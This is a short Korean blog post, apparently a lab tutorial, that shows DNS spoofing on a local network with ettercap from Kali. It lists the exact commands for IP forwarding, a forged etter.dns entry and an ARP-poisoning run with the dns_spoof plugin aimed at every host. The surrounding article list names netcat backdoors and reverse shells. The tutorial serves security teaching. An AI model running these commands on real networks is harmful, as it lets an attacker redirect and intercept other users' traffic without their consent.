본문 바로가기
조회 수 4692 추천 수 0 댓글 0
?

단축키

Prev이전 문서

Next다음 문서

+ - Up Down Comment Print Files
?

단축키

Prev이전 문서

Next다음 문서

+ - Up Down Comment Print Files
DNS Spoofing from CLI (ip forwarding + arp spoofing + dns spoofing with ettercap)

kali: 192.168.122.148 - 00:0c:29:f9:81:10

1. enable ip forwarding in kali
echo 1 > /proc/sys/net/ipv4/ip_forward

2. set fake ip for target web site in etter.dns
locate etter.dns
vi /etc/ettercap/etter.dns
------------------8<--------------------
*.ylabs.co.kr   A       192.168.122.148
------------------8<--------------------

3. check ip for www.ylabs.co.kr in victim machine
01.png

4. run ettercap targeting ANY for arp spoofing + dns spoofing 
ettercap -T -q -M arp:remote -P dns_spoof //

Note: ettercap usage and options
Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]
  -T, --text                  use text only GUI
       -q, --quiet                 do not display packet contents
  -M, --mitm <METHOD:ARGS>    perform a mitm attack
  -P, --plugin <plugin>       launch this <plugin>
  
Note: mitm attacks
arp ([remote],[oneway])
icmp (MAC/IP)
dhcp (ip_pool/netmask/dns)
port ([remote],[tree])

03.png

Note: packets from Kali
1) sends arp packets for scanning
02.png
2) keep sending arp reply for arp poisoning
06.png

5. from victim machine, check arp table and ip address for ylabs.co.kr
04.png

Note: verify the following message from kali
05.png


Title
List of Articles
번호 제목 글쓴이 날짜 조회 수
46 Install crunch on Mac and examples Hojung 2015.02.18 2919
45 Create Kali Live USB Persistence from Mac file Hojung 2015.02.18 3194
44 Firewall Assessment with Prometheus file Hojung 2015.02.04 2335
43 Install WebGoat 5.3 in Kali file Hojung 2015.02.02 3885
42 brute-force HTTP/S basic access authentication with hydra file Hojung 2015.01.07 3756
41 Session Cookie 세부항목에 대해 (secure, Http Only flag) Hojung 2015.01.06 4834
40 쉘코드(shell code)란 payload로 사용되는 작은 코드조각 Hojung 2014.12.23 4441
39 Netcat (nc) guide (port scan, file transfer, backdoor, reverse shell, source port/ip) Hojung 2014.12.16 2483
38 SSH Tunnels (ssh -L localport:host:hostport user@ssh_server -N) Hojung 2014.12.16 1757
37 How to install Damn Vulnerable Linux (DVL) file Hojung 2014.11.26 3238
36 Five Steps of a Hacking Attack Hojung 2014.11.24 1634
35 How to install Snorby in Kali (snort) Hojung 2014.11.19 2961
34 TightVNC on Kali Hojung 2014.11.18 2402
33 10 stage Generic attack process in a nutshell (in chronological order) Hojung 2014.11.07 1818
32 Send HEAD request with netcat (nc - banner grabbing) Hojung 2014.11.05 1961
31 Birthday Attack, Birthday Paradox Hojung 2014.11.03 1825
30 Discovering rogue AP with nmap Hojung 2014.11.03 1829
29 DoS (Denial of Service) 공격에 대해 (Ping of Death, Syn Flooding 공격/탐지/대응, Tear Drop, Smurf/Fraggle, LAND Attack) file Hojung 2014.11.02 5426
28 DNS Spoofing from GUI (ip forwarding + arp spoofing + dns spoofing with ettercap) file Hojung 2014.10.06 2953
» DNS Spoofing from CLI (ip forwarding + arp spoofing + dns spoofing with ettercap) file Hojung 2014.10.06 4692
Board Pagination ‹ Prev 1 2 ... 3 Next ›
/ 3

Designed by sketchbooks.co.kr / sketchbook5 board skin

나눔글꼴 설치 안내


이 PC에는 나눔글꼴이 설치되어 있지 않습니다.

이 사이트를 나눔글꼴로 보기 위해서는
나눔글꼴을 설치해야 합니다.

설치 취소

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5